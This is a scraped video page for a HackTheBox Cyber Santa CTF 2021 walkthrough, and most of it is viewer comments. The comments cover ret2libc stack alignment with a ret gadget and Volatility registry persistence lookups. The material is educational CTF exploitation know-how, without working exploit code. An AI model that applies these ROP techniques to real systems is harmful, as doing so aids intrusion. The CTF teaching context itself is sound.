Day 3 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021

Рет қаралды 2,352

CryptoCat

Күн бұрын

Пікірлер: 29

@adamtain.8931 3 жыл бұрын

I was so mad that I didn't know how to align the stack using RET gadget, thank you for your great video

@_CryptoCat 3 жыл бұрын

haha it always used to get me, now it's the first thing i think of when scripts aren't working remotely! thank you 🥰

@hackticlabs7536 3 жыл бұрын

Hi. For the ret2libc pwn challenge, I had this problem where the exploit was working locally but not on the actual remote target. Now after watching your video, I see you included an extra "ret" instruction before the rop chain. And you mentioned that it's for the stack alignment. Can you please point me to some resources to learn more about this behavior? How did you know that a ret instruction will fix the stack alignment issue? Where can I learn more about these stack alignment issues? Why does this stack alignment issue happen only on the remote target and not on the local? My apologies for so many questions. :S

@_CryptoCat 3 жыл бұрын

good questions! the stack needs to be 16 byte aligned so the payload @ line 64 (23:41) is OK as it is (4 x 8 = 32) but the second payload @ line 91 (24:56) is not since 3 x 8 = 24 (not 16 byte aligned). as for exactly why this is required on some systems but not others.. ROP Emporium can explain better than me in the "stack alignment" and "MOVAPS issue" section: ropemporium.com/guide.html#Common%20pitfalls - TLDR; some GLIBC libraries use movaps instruction which requires the 16 byte alignment

@hadrian3689 3 жыл бұрын

These series are a master class on each pentesting subject all on their own. Great stuff

@_CryptoCat 3 жыл бұрын

thank you bro 🥰🥰🥰

@Blueskycandles 3 жыл бұрын

@_CryptoCat 3 жыл бұрын

@@Blueskycandles hey 🥰

@gontanaka4045 3 жыл бұрын

You make it look easy but there are so many layers of knowledge behind. Thank you.

@_CryptoCat 3 жыл бұрын

love to hear it! thank you 😻

@antimatter6728 3 жыл бұрын

Thank you for uploading this! The way you show how to exploit the pwn challenge with your script really help me understand the process👍👍

@_CryptoCat 3 жыл бұрын

awesome!! thank you 🥰

@hhhhongasdf 3 жыл бұрын

Thank you for the useful and great video. I have a question about the forensics: Persist, so it would be nice to answer it. What is the difference between printkey -K "Microsoft\Windows\CurrentVersion\Run" and printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"?

@_CryptoCat 3 жыл бұрын

thank you and great question! 😊 if you run printkey -K "Microsoft\Windows\CurrentVersion\Run" and there are multiple hives containing this key, it will print them all. if you run printkey -K "Software\Microsoft\Windows\CurrentVersion\Run" it will only look in "Software" for the "Microsoft\Windows\CurrentVersion\Run" key.

@hhhhongasdf 3 жыл бұрын

@@_CryptoCat Oh! That said, if you want a detailed look at the registry keys that persist persistence, you might want to type printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"! Thank you so much for the reply, it was very helpful!

@zak6820 3 жыл бұрын

I can't wait for the fourth and fifth Challenge (web)

@_CryptoCat 3 жыл бұрын

awesome! stay tuned 😉

@SumitSingh-xu4qs 3 жыл бұрын

awsm work+knowledge brother

@_CryptoCat 3 жыл бұрын

thank you bro 🥰

@venatorgamer5051 3 жыл бұрын

Nice Thumbnail.

@_CryptoCat 3 жыл бұрын

haha thanks, i borrowed it from HTB and did some 1337 editing aka change the hue 😂

@Kdaddyis 3 жыл бұрын

Can I play for free those challenges in htb

@_CryptoCat 3 жыл бұрын

they were available for download for a week (5 days during competition and for 2 days after) but i think it's too late now. maybe they will release some as retired challenges on HTB 🤔 i still have some challenge files so if there's a specific file you are looking for let me know!

@Kdaddyis 3 жыл бұрын

@@_CryptoCat thanks for replying.. Am looking for those pwning challenge

@_CryptoCat 3 жыл бұрын

@@Kdaddyis no problem mate, it's against HTB rules to publish the files but if you message me on discord i can send those ones to you - crypto#4049 😉